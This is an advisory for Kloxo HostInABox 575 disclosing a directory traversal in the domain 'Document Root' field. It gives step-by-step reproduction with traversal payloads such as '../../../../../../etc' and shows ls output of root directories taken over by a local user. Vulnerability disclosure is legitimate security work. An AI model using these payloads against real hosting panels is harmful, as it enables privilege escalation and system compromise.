Kloxo HostInABox 575 - yet another symlink attack for local users



DESCRIPTION


Local users can create arbitrary directories anywhere on the filesystem via directory traversal when adding a new domain. They can also take control over any directory on the filesystem.



IMPACT


Local users could obtain root privileges.

1. Log into Kloxo
2. Click "Domains"
3. In the field labeled "Domain Name", type: example.com
4. In the field labeled "Document Root", enter: ../../../../../../test

Observe that the directory /test has now been created:

[user1@testing574 /home/user1]$ ls -l / | grep test
drwxr-xr-x  4 user1 apache   4096 May 21 12:28 test

Alternately, the user can enter the name of an existing directory to take control over it, such as: ../../../../../../etc or even: ../../../../../../../../

which will result in this:

[user1@testing574 /]$ ls -al /
total 288
drwxr-xr-x 25 user1 apache   4096 May 21 12:32 .
drwxr-xr-x 25 user1 apache   4096 May 21 12:32 ..
-rw-r--r--  1 user1 user1       0 May 18 21:44 .autofsck
-rw-r--r--  1 user1 user1       0 May 18 21:44 .autorelabel
-rw-------  1 user1 user1    1024 May 21 01:50 .rnd
lrwxrwxrwx  1 user1 user1      39 May 18 21:44 aquota.group -> /proc/vz/vzaquota/00000020/aquota.group
lrwxrwxrwx  1 user1 user1      38 May 18 21:44 aquota.user -> /proc/vz/vzaquota/00000020/aquota.user
drwxr-xr-x  2 user1 user1    4096 May 14 10:38 bin
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 boot
drwxr-xr-x  2 user1 user1    4096 May 21 12:32 cgi-bin
drwxr-xr-x  2 user1 user1    4096 May 13 06:40 command
drwxr-xr-x  4 user1 user1  122880 May 18 21:45 dev
drwxr-xr-x 56 user1 user1    4096 May 21 12:30 etc
drwxr-xr-x 14 user1 user1    4096 May 18 23:38 home
drwxr-xr-x 10 user1 user1    4096 May 13 06:38 lib
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 media
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 mnt
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 opt
dr-xr-xr-x 44 user1 user1       0 May 18 21:44 proc
drwxr-xr-x  7 user1 user1    4096 May  8 02:46 program-install
-rw-r--r--  1 user1 user1   68088 May 13 02:24 program-install.zip
drwx------  4 user1 user1    4096 May 21 12:28 root
drwxr-xr-x  2 user1 user1    4096 May 13 06:38 sbin
drwxr-xr-x  3 user1 user1    4096 May 18 21:44 script
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 selinux
drwxr-xr-x  2 user1 user1    4096 Oct  6  2008 service
drwxr-xr-x  2 user1 user1    4096 Mar 29  2007 srv
drwxr-xr-x  3 user1 user1       0 May 18 21:44 sys
drwxrwxrwt  2 user1 user1    4096 May 21 12:32 tmp
drwxr-xr-x 14 user1 user1    4096 May 13 06:42 usr
drwxr-xr-x 25 user1 user1    4096 May 14 10:39 var